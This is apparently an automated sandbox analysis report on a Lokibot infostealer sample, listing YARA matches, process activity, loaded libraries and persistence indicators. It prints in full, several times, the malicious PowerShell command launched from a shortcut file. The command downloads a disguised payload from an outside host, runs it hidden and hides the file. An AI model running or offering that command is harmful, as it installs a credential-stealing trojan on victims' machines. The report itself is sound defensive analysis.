                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: mjtjewi.exe.0.drStatic PE information: Section: j1CM!e^U ZLIB complexity 1.0003301933811801
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winLNK@12/10@3/2
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,6_2_0040434D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                    Source: C:\Users\user\Desktop\mjtjewi.exeMutant created: NULL
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Comprobante.lnk.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\mjtjewi.exeUnpacked PE file: 4.2.mjtjewi.exe.b70000.0.unpack j1CM!e^U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                    Source: Yara matchFile source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR
                    Source: mjtjewi.exe.0.drStatic PE information: section name: j1CM!e^U
                    Source: mjtjewi.exe.0.drStatic PE information: section name:
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE7DE700BD pushad ; iretd 0_2_00007FFE7DE700C1
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_00BB81B8 pushfd ; ret 4_2_00BB81BF
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_00BB79E2 push esp; retf 4_2_00BB79E8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01521503 push ss; retf 4_2_01521504
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01521522 push ebp; retf 4_2_01521523
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AD4
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AFC
                    Source: mjtjewi.exe.0.drStatic PE information: section name: j1CM!e^U entropy: 7.999315698306394

                    Persistence and Installation Behavior

                    barindex
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                    Source: C:\Users\user\Desktop\mjtjewi.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\mjtjewi.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
